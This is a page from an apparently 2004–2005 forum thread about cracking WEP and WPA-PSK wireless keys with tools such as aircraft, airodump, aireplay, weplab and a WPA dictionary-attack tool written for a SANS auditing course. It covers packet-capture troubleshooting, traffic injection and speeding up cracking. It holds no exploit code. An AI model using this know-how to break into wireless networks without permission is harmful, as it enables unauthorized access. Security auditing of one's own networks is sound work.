Page 10 of 10

PostPosted: Tue Oct 12, 2004 11:30 am
by chesh
One other thing I'd like to mention, when I do a weplab -a on my Kismet.dump file it says that there are XXXXX number of uniquie IVs which when I check Kismet seems to be the same number of data packets collected from my network. Does this seem right? The other number that Kismet shows is XXXX number of crypted packets collected, but that number doesn't seem to be referenced within weplab what-so-ever. So, are uniquie IV's crypted packets, or just uniquie data packets?

chesh

PostPosted: Wed Oct 13, 2004 7:26 am
by chesh
chesh wrote:My second question is, how does one generate more packets in order to crack? I've heard talk of doing an arping or something to that extent to generate packets. Would someone post the info on how this is done, if you need two wireless adapters, or what? Thanks guys.

chesh


Ok, I jumped the gun a little bit on a couple of these questions. I tried aircrack last night for the first time with airodump and aireplay. I got myself a 770mb dump file with 880k of unique IV packets. My new question is, when I load this into aircrack it says there is 880k worth of unique packets, but when I load it into weplab it says there is only 88k worth of packets. Why the difference? Also, airodump says that the network is a 54mb WPA encrypted network, when I know it's a BEFW11S4 using 128-bit WEP. I further this knowing that aircrack is supposed to deny WPA packets when loading the dump file and it loads all the packets just fine and starts away on it's little cracking adventure. I have to say, if I didn't know it was 128-bit WEP and started a 64-bit crack on it, it finished and told me that a key didn't exist in about 34secs. This was with aircrack fudge factor of 2. When I ran weplab on the other hand, it took an hour to two do discover that it wasn't a 64-bit key. Anyways, just thought I'd post my findings, any comments, flames are more then welcome.

chesh

PostPosted: Fri Oct 15, 2004 7:33 am
by chesh
joswr1ght wrote:I'm not much for UI design (love those Unix tools though), but here goes. I'm going to release this tool in the first teaching of the SANS Wireless Auditing class in New Orleans in November (I am the author of this material), and will make it publicly available after that.

screen shot

This tool is an implementation of Robert Moskowitz's paper "Weakness in Passphrase Choice in WPA Interface" at http://wifinetnews.com/archives/002452.html. It kind of sucks, since it's pretty slow. I've done everything to optimize it that I believe can be done, but 4096 hmac-sha1 passes take quite a bit of time to derive the PMK from a dictionary word. I'm looking forward to comments after releasing publicly.

Thanks,

-Josh



I saw in the latest version of Auditor (auditor-081004-01) you've already released this tool to them. Since it's already in the public, when are you planning on releasing a source download to the masses?

chesh

PostPosted: Fri Oct 15, 2004 9:21 am
by joswr1ght
chesh wrote:I saw in the latest version of Auditor (auditor-081004-01) you've already released this tool to them. Since it's already in the public, when are you planning on releasing a source download to the masses?

chesh


11/3, right after the SANS WLAN Auditing course runs in New Orleans.

If anyone wants the source early and is willing to provide some feedback/testing, drop me a note at jwright@hasborg.com.

Thanks,

-Josh

PostPosted: Fri Oct 15, 2004 9:59 am
by devine
When I load this into aircrack it says there is 880k worth of unique packets, but when I load it into weplab it says there is only 88k worth of packets. Why the difference?

Hard to tell. Post the first meg of your pcap file somewhere, this would help me and TopoLB to track down the problem.

Also, airodump says that the network is a 54mb WPA encrypted network, when I know it's a BEFW11S4 using 128-bit WEP.

That's a known bug in airodump 2.1. Will be fixed in the next release.

it finished and told me that a key didn't exist in about 34secs. This was with aircrack fudge factor of 2.

Maybe try increasing the fudge factor. Also if it's 802.1X aircrack will very likely fail.

post-edit: messed up with the version number

PostPosted: Fri Oct 15, 2004 10:01 am
by chesh
What's the easiest way to cut down my 770mb pcap file to 1mb?

chesh

PostPosted: Fri Oct 15, 2004 10:41 am
by joswr1ght
chesh wrote:What's the easiest way to cut down my 770mb pcap file to 1mb?

chesh


Sample the first few thousand files with tcpdump:

$ tcpdump -r bigfile.dump -w smallfile.dump -c 2000

Repeat until the "-c" number gives you what you want.

Note: This will not work with tethereal, the "-c" behavior does not work when reading from a stored capture file.

-Josh

Speeding Up WPA PSK Attack

PostPosted: Sat Oct 16, 2004 4:26 am
by Kronk
Joshua,

The KisMAC tool implements the WPA PSK attack using G4 Altivec acceleration to improve performance significantly. Maybe you can do something similar with MMX with your WPA code.

The KisMAC source code is located at http://binaervarianz.de/projekte/programmieren/kismac/download.php and may be helpful.

Kronk

PostPosted: Sat Oct 16, 2004 4:31 am
by devine
Kronk wrote:The KisMAC tool implements the WPA PSK attack using G4 Altivec acceleration to improve performance significantly. Maybe you can do something similar with MMX with your WPA code.


Indeed. Also, I was thinking about distributed WPA-PSK cracking. Could speed up things quite a bit, especially if you have a few spare machines :)

PostPosted: Tue Jan 04, 2005 9:49 am
by grcore
chesh wrote:What's the easiest way to cut down my 770mb pcap file to 1mb?

chesh


Are you trying to filter out the IV packets?

Use ethereal to and run a filter and save the output.

g

Working with wrt54g ?

PostPosted: Sun Feb 20, 2005 5:40 am
by net-titi
Would it work with Linksys WRT54G router, like Kismet does ?

PostPosted: Wed Feb 23, 2005 12:24 pm
by devine
chesh wrote:What's the easiest way to cut down my 770mb pcap file to 1mb?


Not many options right now, but that's a planned feature of airodump 2.2, which will make it possible to only save the IVs from a live capture session, or extract then save them from a pcap file. Each IV will use about 6 bytes: bssid_index(1) + IV_itself(3) + ciphertext_start(2). However, this new file format will only be understood by aircrack 2.2.

PostPosted: Thu Apr 21, 2005 2:49 pm
by kleptophobiac
Wow, this is a massively long thread, and I will admit that I ceased reading about page 11.

1) Would you care to post the win32 source code somewhere? I'm interested in taking a peek at it, even though I'm terrible with C (I do java... need to work on C)

2) I popped wzcook into a hex editor and did the proper edits, and it works great. I figured I'd post the fixed binary, just so others wouldn't have to go download a hex editor. :) here

3) Thanks for the work!